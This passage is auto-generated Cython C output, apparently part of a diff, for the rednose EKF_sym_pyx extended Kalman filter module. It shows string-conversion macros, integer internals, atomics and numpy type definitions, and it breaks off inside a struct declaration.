__PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT (PY_MAJOR_VERSION >= 3 && __PYX_DEFAULT_STRING_ENCODING_IS_UTF8) +#define __PYX_DEFAULT_STRING_ENCODING "" +#define __Pyx_PyObject_FromString __Pyx_PyBytes_FromString +#define __Pyx_PyObject_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#define __Pyx_uchar_cast(c) ((unsigned char)c) +#define __Pyx_long_cast(x) ((long)x) +#define __Pyx_fits_Py_ssize_t(v, type, is_signed) (\ + (sizeof(type) < sizeof(Py_ssize_t)) ||\ + (sizeof(type) > sizeof(Py_ssize_t) &&\ + likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX) &&\ + (!is_signed || likely(v > (type)PY_SSIZE_T_MIN ||\ + v == (type)PY_SSIZE_T_MIN))) ||\ + (sizeof(type) == sizeof(Py_ssize_t) &&\ + (is_signed || likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX))) ) +static CYTHON_INLINE int __Pyx_is_valid_index(Py_ssize_t i, Py_ssize_t limit) { + return (size_t) i < (size_t) limit; +} +#if defined (__cplusplus) && __cplusplus >= 201103L + #include + #define __Pyx_sst_abs(value) std::abs(value) +#elif SIZEOF_INT >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) abs(value) +#elif SIZEOF_LONG >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) labs(value) +#elif defined (_MSC_VER) + #define __Pyx_sst_abs(value) ((Py_ssize_t)_abs64(value)) +#elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define __Pyx_sst_abs(value) llabs(value) +#elif defined (__GNUC__) + #define __Pyx_sst_abs(value) __builtin_llabs(value) +#else + #define __Pyx_sst_abs(value) ((value<0) ? -value : value) +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject*); +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject*, Py_ssize_t* length); +#define __Pyx_PyByteArray_FromString(s) PyByteArray_FromStringAndSize((const char*)s, strlen((const char*)s)) +#define __Pyx_PyByteArray_FromStringAndSize(s, l) PyByteArray_FromStringAndSize((const char*)s, l) +#define __Pyx_PyBytes_FromString PyBytes_FromString +#define __Pyx_PyBytes_FromStringAndSize PyBytes_FromStringAndSize +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char*); +#if PY_MAJOR_VERSION < 3 + #define __Pyx_PyStr_FromString __Pyx_PyBytes_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#else + #define __Pyx_PyStr_FromString __Pyx_PyUnicode_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyUnicode_FromStringAndSize +#endif +#define __Pyx_PyBytes_AsWritableString(s) ((char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableSString(s) ((signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableUString(s) ((unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsString(s) ((const char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsSString(s) ((const signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsUString(s) ((const unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyObject_AsWritableString(s) ((char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableSString(s) ((signed char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableUString(s) ((unsigned char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsSString(s) ((const signed char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsUString(s) ((const unsigned char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_FromCString(s) __Pyx_PyObject_FromString((const char*)s) +#define __Pyx_PyBytes_FromCString(s) __Pyx_PyBytes_FromString((const char*)s) +#define __Pyx_PyByteArray_FromCString(s) __Pyx_PyByteArray_FromString((const char*)s) +#define __Pyx_PyStr_FromCString(s) __Pyx_PyStr_FromString((const char*)s) +#define __Pyx_PyUnicode_FromCString(s) __Pyx_PyUnicode_FromString((const char*)s) +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const wchar_t *u) +{ + const wchar_t *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#else +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const Py_UNICODE *u) +{ + const Py_UNICODE *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#endif +#define __Pyx_PyUnicode_FromOrdinal(o) PyUnicode_FromOrdinal((int)o) +#define __Pyx_PyUnicode_FromUnicode(u) PyUnicode_FromUnicode(u, __Pyx_Py_UNICODE_strlen(u)) +#define __Pyx_PyUnicode_FromUnicodeAndLength PyUnicode_FromUnicode +#define __Pyx_PyUnicode_AsUnicode PyUnicode_AsUnicode +#define __Pyx_NewRef(obj) (Py_INCREF(obj), obj) +#define __Pyx_Owned_Py_None(b) __Pyx_NewRef(Py_None) +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b); +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject*); +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject*); +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x); +#define __Pyx_PySequence_Tuple(obj)\ + (likely(PyTuple_CheckExact(obj)) ? __Pyx_NewRef(obj) : PySequence_Tuple(obj)) +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject*); +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t); +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject*); +#if CYTHON_ASSUME_SAFE_MACROS +#define __pyx_PyFloat_AsDouble(x) (PyFloat_CheckExact(x) ? PyFloat_AS_DOUBLE(x) : PyFloat_AsDouble(x)) +#else +#define __pyx_PyFloat_AsDouble(x) PyFloat_AsDouble(x) +#endif +#define __pyx_PyFloat_AsFloat(x) ((float) __pyx_PyFloat_AsDouble(x)) +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyNumber_Int(x) (PyLong_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Long(x)) +#else +#define __Pyx_PyNumber_Int(x) (PyInt_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Int(x)) +#endif +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_VERSION_HEX >= 0x030C00A7 + #ifndef _PyLong_SIGN_MASK + #define _PyLong_SIGN_MASK 3 + #endif + #ifndef _PyLong_NON_SIZE_BITS + #define _PyLong_NON_SIZE_BITS 3 + #endif + #define __Pyx_PyLong_Sign(x) (((PyLongObject*)x)->long_value.lv_tag & _PyLong_SIGN_MASK) + #define __Pyx_PyLong_IsNeg(x) ((__Pyx_PyLong_Sign(x) & 2) != 0) + #define __Pyx_PyLong_IsNonNeg(x) (!__Pyx_PyLong_IsNeg(x)) + #define __Pyx_PyLong_IsZero(x) (__Pyx_PyLong_Sign(x) & 1) + #define __Pyx_PyLong_IsPos(x) (__Pyx_PyLong_Sign(x) == 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) (__Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) ((Py_ssize_t) (((PyLongObject*)x)->long_value.lv_tag >> _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_SignedDigitCount(x)\ + ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * __Pyx_PyLong_DigitCount(x)) + #if defined(PyUnstable_Long_IsCompact) && defined(PyUnstable_Long_CompactValue) + #define __Pyx_PyLong_IsCompact(x) PyUnstable_Long_IsCompact((PyLongObject*) x) + #define __Pyx_PyLong_CompactValue(x) PyUnstable_Long_CompactValue((PyLongObject*) x) + #else + #define __Pyx_PyLong_IsCompact(x) (((PyLongObject*)x)->long_value.lv_tag < (2 << _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_CompactValue(x) ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * (Py_ssize_t) __Pyx_PyLong_Digits(x)[0]) + #endif + typedef Py_ssize_t __Pyx_compact_pylong; + typedef size_t __Pyx_compact_upylong; + #else // Py < 3.12 + #define __Pyx_PyLong_IsNeg(x) (Py_SIZE(x) < 0) + #define __Pyx_PyLong_IsNonNeg(x) (Py_SIZE(x) >= 0) + #define __Pyx_PyLong_IsZero(x) (Py_SIZE(x) == 0) + #define __Pyx_PyLong_IsPos(x) (Py_SIZE(x) > 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) ((Py_SIZE(x) == 0) ? 0 : __Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) __Pyx_sst_abs(Py_SIZE(x)) + #define __Pyx_PyLong_SignedDigitCount(x) Py_SIZE(x) + #define __Pyx_PyLong_IsCompact(x) (Py_SIZE(x) == 0 || Py_SIZE(x) == 1 || Py_SIZE(x) == -1) + #define __Pyx_PyLong_CompactValue(x)\ + ((Py_SIZE(x) == 0) ? (sdigit) 0 : ((Py_SIZE(x) < 0) ? -(sdigit)__Pyx_PyLong_Digits(x)[0] : (sdigit)__Pyx_PyLong_Digits(x)[0])) + typedef sdigit __Pyx_compact_pylong; + typedef digit __Pyx_compact_upylong; + #endif + #if PY_VERSION_HEX >= 0x030C00A5 + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->long_value.ob_digit) + #else + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->ob_digit) + #endif +#endif +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII +static int __Pyx_sys_getdefaultencoding_not_ascii; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + PyObject* ascii_chars_u = NULL; + PyObject* ascii_chars_b = NULL; + const char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + if (strcmp(default_encoding_c, "ascii") == 0) { + __Pyx_sys_getdefaultencoding_not_ascii = 0; + } else { + char ascii_chars[128]; + int c; + for (c = 0; c < 128; c++) { + ascii_chars[c] = (char) c; + } + __Pyx_sys_getdefaultencoding_not_ascii = 1; + ascii_chars_u = PyUnicode_DecodeASCII(ascii_chars, 128, NULL); + if (!ascii_chars_u) goto bad; + ascii_chars_b = PyUnicode_AsEncodedString(ascii_chars_u, default_encoding_c, NULL); + if (!ascii_chars_b || !PyBytes_Check(ascii_chars_b) || memcmp(ascii_chars, PyBytes_AS_STRING(ascii_chars_b), 128) != 0) { + PyErr_Format( + PyExc_ValueError, + "This module compiled with c_string_encoding=ascii, but default encoding '%.200s' is not a superset of ascii.", + default_encoding_c); + goto bad; + } + Py_DECREF(ascii_chars_u); + Py_DECREF(ascii_chars_b); + } + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + Py_XDECREF(ascii_chars_u); + Py_XDECREF(ascii_chars_b); + return -1; +} +#endif +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT && PY_MAJOR_VERSION >= 3 +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_DecodeUTF8(c_str, size, NULL) +#else +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_Decode(c_str, size, __PYX_DEFAULT_STRING_ENCODING, NULL) +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +static char* __PYX_DEFAULT_STRING_ENCODING; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) (const char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + __PYX_DEFAULT_STRING_ENCODING = (char*) malloc(strlen(default_encoding_c) + 1); + if (!__PYX_DEFAULT_STRING_ENCODING) goto bad; + strcpy(__PYX_DEFAULT_STRING_ENCODING, default_encoding_c); + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + return -1; +} +#endif +#endif + + +/* Test for GCC > 2.95 */ +#if defined(__GNUC__) && (__GNUC__ > 2 || (__GNUC__ == 2 && (__GNUC_MINOR__ > 95))) + #define likely(x) __builtin_expect(!!(x), 1) + #define unlikely(x) __builtin_expect(!!(x), 0) +#else /* !__GNUC__ or GCC < 2.95 */ + #define likely(x) (x) + #define unlikely(x) (x) +#endif /* __GNUC__ */ +static CYTHON_INLINE void __Pyx_pretend_to_initialize(void* ptr) { (void)ptr; } + +#if !CYTHON_USE_MODULE_STATE +static PyObject *__pyx_m = NULL; +#endif +static int __pyx_lineno; +static int __pyx_clineno = 0; +static const char * __pyx_cfilenm = __FILE__; +static const char *__pyx_filename; + +/* Header.proto */ +#if !defined(CYTHON_CCOMPLEX) + #if defined(__cplusplus) + #define CYTHON_CCOMPLEX 1 + #elif (defined(_Complex_I) && !defined(_MSC_VER)) || ((defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L) && !defined(__STDC_NO_COMPLEX__)) + #define CYTHON_CCOMPLEX 1 + #else + #define CYTHON_CCOMPLEX 0 + #endif +#endif +#if CYTHON_CCOMPLEX + #ifdef __cplusplus + #include + #else + #include + #endif +#endif +#if CYTHON_CCOMPLEX && !defined(__cplusplus) && defined(__sun__) && defined(__GNUC__) + #undef _Complex_I + #define _Complex_I 1.0fj +#endif + +/* #### Code section: filename_table ### */ + +static const char *__pyx_f[] = { + "rednose/helpers/ekf_sym_pyx.pyx", + "", + "__init__.cython-30.pxd", + "type.pxd", +}; +/* #### Code section: utility_code_proto_before_types ### */ +/* ForceInitThreads.proto */ +#ifndef __PYX_FORCE_INIT_THREADS + #define __PYX_FORCE_INIT_THREADS 0 +#endif + +/* NoFastGil.proto */ +#define __Pyx_PyGILState_Ensure PyGILState_Ensure +#define __Pyx_PyGILState_Release PyGILState_Release +#define __Pyx_FastGIL_Remember() +#define __Pyx_FastGIL_Forget() +#define __Pyx_FastGilFuncInit() + +/* BufferFormatStructs.proto */ +struct __Pyx_StructField_; +#define __PYX_BUF_FLAGS_PACKED_STRUCT (1 << 0) +typedef struct { + const char* name; + struct __Pyx_StructField_* fields; + size_t size; + size_t arraysize[8]; + int ndim; + char typegroup; + char is_unsigned; + int flags; +} __Pyx_TypeInfo; +typedef struct __Pyx_StructField_ { + __Pyx_TypeInfo* type; + const char* name; + size_t offset; +} __Pyx_StructField; +typedef struct { + __Pyx_StructField* field; + size_t parent_offset; +} __Pyx_BufFmt_StackElem; +typedef struct { + __Pyx_StructField root; + __Pyx_BufFmt_StackElem* head; + size_t fmt_offset; + size_t new_count, enc_count; + size_t struct_alignment; + int is_complex; + char enc_type; + char new_packmode; + char enc_packmode; + char is_valid_array; +} __Pyx_BufFmt_Context; + +/* Atomics.proto */ +#include +#ifndef CYTHON_ATOMICS + #define CYTHON_ATOMICS 1 +#endif +#define __PYX_CYTHON_ATOMICS_ENABLED() CYTHON_ATOMICS +#define __pyx_atomic_int_type int +#define __pyx_nonatomic_int_type int +#if CYTHON_ATOMICS && (defined(__STDC_VERSION__) &&\ + (__STDC_VERSION__ >= 201112L) &&\ + !defined(__STDC_NO_ATOMICS__)) + #include +#elif CYTHON_ATOMICS && (defined(__cplusplus) && (\ + (__cplusplus >= 201103L) ||\ + (defined(_MSC_VER) && _MSC_VER >= 1700))) + #include +#endif +#if CYTHON_ATOMICS && (defined(__STDC_VERSION__) &&\ + (__STDC_VERSION__ >= 201112L) &&\ + !defined(__STDC_NO_ATOMICS__) &&\ + ATOMIC_INT_LOCK_FREE == 2) + #undef __pyx_atomic_int_type + #define __pyx_atomic_int_type atomic_int + #define __pyx_atomic_incr_aligned(value) atomic_fetch_add_explicit(value, 1, memory_order_relaxed) + #define __pyx_atomic_decr_aligned(value) atomic_fetch_sub_explicit(value, 1, memory_order_acq_rel) + #if defined(__PYX_DEBUG_ATOMICS) && defined(_MSC_VER) + #pragma message ("Using standard C atomics") + #elif defined(__PYX_DEBUG_ATOMICS) + #warning "Using standard C atomics" + #endif +#elif CYTHON_ATOMICS && (defined(__cplusplus) && (\ + (__cplusplus >= 201103L) ||\ +\ + (defined(_MSC_VER) && _MSC_VER >= 1700)) &&\ + ATOMIC_INT_LOCK_FREE == 2) + #undef __pyx_atomic_int_type + #define __pyx_atomic_int_type std::atomic_int + #define __pyx_atomic_incr_aligned(value) std::atomic_fetch_add_explicit(value, 1, std::memory_order_relaxed) + #define __pyx_atomic_decr_aligned(value) std::atomic_fetch_sub_explicit(value, 1, std::memory_order_acq_rel) + #if defined(__PYX_DEBUG_ATOMICS) && defined(_MSC_VER) + #pragma message ("Using standard C++ atomics") + #elif defined(__PYX_DEBUG_ATOMICS) + #warning "Using standard C++ atomics" + #endif +#elif CYTHON_ATOMICS && (__GNUC__ >= 5 || (__GNUC__ == 4 &&\ + (__GNUC_MINOR__ > 1 ||\ + (__GNUC_MINOR__ == 1 && __GNUC_PATCHLEVEL__ >= 2)))) + #define __pyx_atomic_incr_aligned(value) __sync_fetch_and_add(value, 1) + #define __pyx_atomic_decr_aligned(value) __sync_fetch_and_sub(value, 1) + #ifdef __PYX_DEBUG_ATOMICS + #warning "Using GNU atomics" + #endif +#elif CYTHON_ATOMICS && defined(_MSC_VER) + #include + #undef __pyx_atomic_int_type + #define __pyx_atomic_int_type long + #define __pyx_nonatomic_int_type long + #pragma intrinsic (_InterlockedExchangeAdd) + #define __pyx_atomic_incr_aligned(value) _InterlockedExchangeAdd(value, 1) + #define __pyx_atomic_decr_aligned(value) _InterlockedExchangeAdd(value, -1) + #ifdef __PYX_DEBUG_ATOMICS + #pragma message ("Using MSVC atomics") + #endif +#else + #undef CYTHON_ATOMICS + #define CYTHON_ATOMICS 0 + #ifdef __PYX_DEBUG_ATOMICS + #warning "Not using atomics" + #endif +#endif +#if CYTHON_ATOMICS + #define __pyx_add_acquisition_count(memview)\ + __pyx_atomic_incr_aligned(__pyx_get_slice_count_pointer(memview)) + #define __pyx_sub_acquisition_count(memview)\ + __pyx_atomic_decr_aligned(__pyx_get_slice_count_pointer(memview)) +#else + #define __pyx_add_acquisition_count(memview)\ + __pyx_add_acquisition_count_locked(__pyx_get_slice_count_pointer(memview), memview->lock) + #define __pyx_sub_acquisition_count(memview)\ + __pyx_sub_acquisition_count_locked(__pyx_get_slice_count_pointer(memview), memview->lock) +#endif + +/* MemviewSliceStruct.proto */ +struct __pyx_memoryview_obj; +typedef struct { + struct __pyx_memoryview_obj *memview; + char *data; + Py_ssize_t shape[8]; + Py_ssize_t strides[8]; + Py_ssize_t suboffsets[8]; +} __Pyx_memviewslice; +#define __Pyx_MemoryView_Len(m) (m.shape[0]) + +/* #### Code section: numeric_typedefs ### */ + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":731 + * # in Cython to enable them only on the right systems. + * + * ctypedef npy_int8 int8_t # <<<<<<<<<<<<<< + * ctypedef npy_int16 int16_t + * ctypedef npy_int32 int32_t + */ +typedef npy_int8 __pyx_t_5numpy_int8_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":732 + * + * ctypedef npy_int8 int8_t + * ctypedef npy_int16 int16_t # <<<<<<<<<<<<<< + * ctypedef npy_int32 int32_t + * ctypedef npy_int64 int64_t + */ +typedef npy_int16 __pyx_t_5numpy_int16_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":733 + * ctypedef npy_int8 int8_t + * ctypedef npy_int16 int16_t + * ctypedef npy_int32 int32_t # <<<<<<<<<<<<<< + * ctypedef npy_int64 int64_t + * #ctypedef npy_int96 int96_t + */ +typedef npy_int32 __pyx_t_5numpy_int32_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":734 + * ctypedef npy_int16 int16_t + * ctypedef npy_int32 int32_t + * ctypedef npy_int64 int64_t # <<<<<<<<<<<<<< + * #ctypedef npy_int96 int96_t + * #ctypedef npy_int128 int128_t + */ +typedef npy_int64 __pyx_t_5numpy_int64_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":738 + * #ctypedef npy_int128 int128_t + * + * ctypedef npy_uint8 uint8_t # <<<<<<<<<<<<<< + * ctypedef npy_uint16 uint16_t + * ctypedef npy_uint32 uint32_t + */ +typedef npy_uint8 __pyx_t_5numpy_uint8_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":739 + * + * ctypedef npy_uint8 uint8_t + * ctypedef npy_uint16 uint16_t # <<<<<<<<<<<<<< + * ctypedef npy_uint32 uint32_t + * ctypedef npy_uint64 uint64_t + */ +typedef npy_uint16 __pyx_t_5numpy_uint16_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":740 + * ctypedef npy_uint8 uint8_t + * ctypedef npy_uint16 uint16_t + * ctypedef npy_uint32 uint32_t # <<<<<<<<<<<<<< + * ctypedef npy_uint64 uint64_t + * #ctypedef npy_uint96 uint96_t + */ +typedef npy_uint32 __pyx_t_5numpy_uint32_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":741 + * ctypedef npy_uint16 uint16_t + * ctypedef npy_uint32 uint32_t + * ctypedef npy_uint64 uint64_t # <<<<<<<<<<<<<< + * #ctypedef npy_uint96 uint96_t + * #ctypedef npy_uint128 uint128_t + */ +typedef npy_uint64 __pyx_t_5numpy_uint64_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":745 + * #ctypedef npy_uint128 uint128_t + * + * ctypedef npy_float32 float32_t # <<<<<<<<<<<<<< + * ctypedef npy_float64 float64_t + * #ctypedef npy_float80 float80_t + */ +typedef npy_float32 __pyx_t_5numpy_float32_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":746 + * + * ctypedef npy_float32 float32_t + * ctypedef npy_float64 float64_t # <<<<<<<<<<<<<< + * #ctypedef npy_float80 float80_t + * #ctypedef npy_float128 float128_t + */ +typedef npy_float64 __pyx_t_5numpy_float64_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":755 + * # The int types are mapped a bit surprising -- + * # numpy.int corresponds to 'l' and numpy.long to 'q' + * ctypedef npy_long int_t # <<<<<<<<<<<<<< + * ctypedef npy_longlong long_t + * ctypedef npy_longlong longlong_t + */ +typedef npy_long __pyx_t_5numpy_int_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":756 + * # numpy.int corresponds to 'l' and numpy.long to 'q' + * ctypedef npy_long int_t + * ctypedef npy_longlong long_t # <<<<<<<<<<<<<< + * ctypedef npy_longlong longlong_t + * + */ +typedef npy_longlong __pyx_t_5numpy_long_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":757 + * ctypedef npy_long int_t + * ctypedef npy_longlong long_t + * ctypedef npy_longlong longlong_t # <<<<<<<<<<<<<< + * + * ctypedef npy_ulong uint_t + */ +typedef npy_longlong __pyx_t_5numpy_longlong_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":759 + * ctypedef npy_longlong longlong_t + * + * ctypedef npy_ulong uint_t # <<<<<<<<<<<<<< + * ctypedef npy_ulonglong ulong_t + * ctypedef npy_ulonglong ulonglong_t + */ +typedef npy_ulong __pyx_t_5numpy_uint_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":760 + * + * ctypedef npy_ulong uint_t + * ctypedef npy_ulonglong ulong_t # <<<<<<<<<<<<<< + * ctypedef npy_ulonglong ulonglong_t + * + */ +typedef npy_ulonglong __pyx_t_5numpy_ulong_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":761 + * ctypedef npy_ulong uint_t + * ctypedef npy_ulonglong ulong_t + * ctypedef npy_ulonglong ulonglong_t # <<<<<<<<<<<<<< + * + * ctypedef npy_intp intp_t + */ +typedef npy_ulonglong __pyx_t_5numpy_ulonglong_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":763 + * ctypedef npy_ulonglong ulonglong_t + * + * ctypedef npy_intp intp_t # <<<<<<<<<<<<<< + * ctypedef npy_uintp uintp_t + * + */ +typedef npy_intp __pyx_t_5numpy_intp_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":764 + * + * ctypedef npy_intp intp_t + * ctypedef npy_uintp uintp_t # <<<<<<<<<<<<<< + * + * ctypedef npy_double float_t + */ +typedef npy_uintp __pyx_t_5numpy_uintp_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":766 + * ctypedef npy_uintp uintp_t + * + * ctypedef npy_double float_t # <<<<<<<<<<<<<< + * ctypedef npy_double double_t + * ctypedef npy_longdouble longdouble_t + */ +typedef npy_double __pyx_t_5numpy_float_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":767 + * + * ctypedef npy_double float_t + * ctypedef npy_double double_t # <<<<<<<<<<<<<< + * ctypedef npy_longdouble longdouble_t + * + */ +typedef npy_double __pyx_t_5numpy_double_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":768 + * ctypedef npy_double float_t + * ctypedef npy_double double_t + * ctypedef npy_longdouble longdouble_t # <<<<<<<<<<<<<< + * + * ctypedef npy_cfloat cfloat_t + */ +typedef npy_longdouble __pyx_t_5numpy_longdouble_t; +/* #### Code section: complex_type_declarations ### */ +/* Declarations.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + typedef ::std::complex< float > __pyx_t_float_complex; + #else + typedef float _Complex __pyx_t_float_complex; + #endif +#else + typedef struct { float real, imag; } __pyx_t_float_complex; +#endif +static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float, float); + +/* Declarations.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + typedef ::std::complex< double > __pyx_t_double_complex; + #else + typedef double _Complex __pyx_t_double_complex; + #endif +#else + typedef struct { double real, imag; } __pyx_t_double_complex; +#endif +static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double, double); + +/* #### Code section: type_declarations ### */ + +/*--- Type declarations ---*/ +struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx; +struct __pyx_array_obj; +struct __pyx_MemviewEnum_obj; +struct __pyx_memoryview_obj; +struct __pyx_memoryviewslice_obj; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":770 + * ctypedef npy_longdouble longdouble_t + * + * ctypedef npy_cfloat cfloat_t # <<<<<<<<<<<<<< + * ctypedef npy_cdouble cdouble_t + * ctypedef npy_clongdouble clongdouble_t + */ +typedef npy_cfloat __pyx_t_5numpy_cfloat_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":771 + * + * ctypedef npy_cfloat cfloat_t + * ctypedef npy_cdouble cdouble_t # <<<<<<<<<<<<<< + * ctypedef npy_clongdouble clongdouble_t + * + */ +typedef npy_cdouble __pyx_t_5numpy_cdouble_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":772 + * ctypedef npy_cfloat cfloat_t + * ctypedef npy_cdouble cdouble_t + * ctypedef npy_clongdouble clongdouble_t # <<<<<<<<<<<<<< + * + * ctypedef npy_cdouble complex_t + */ +typedef npy_clongdouble __pyx_t_5numpy_clongdouble_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":774 + * ctypedef npy_clongdouble clongdouble_t + * + * ctypedef npy_cdouble complex_t # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew1(a): + */ +typedef npy_cdouble __pyx_t_5numpy_complex_t; + +/* "rednose/helpers/ekf_sym_pyx.pyx":81 + * return np.copy(np.asarray(mem_view, dtype=np.double, order="C")) + * + * cdef class EKF_sym_pyx: # <<<<<<<<<<<<<< + * cdef EKFSym* ekf + * def __cinit__(self, str gen_dir, str name, np.ndarray[np.float64_t, ndim=2] Q, + */ +struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx { + PyObject_HEAD + 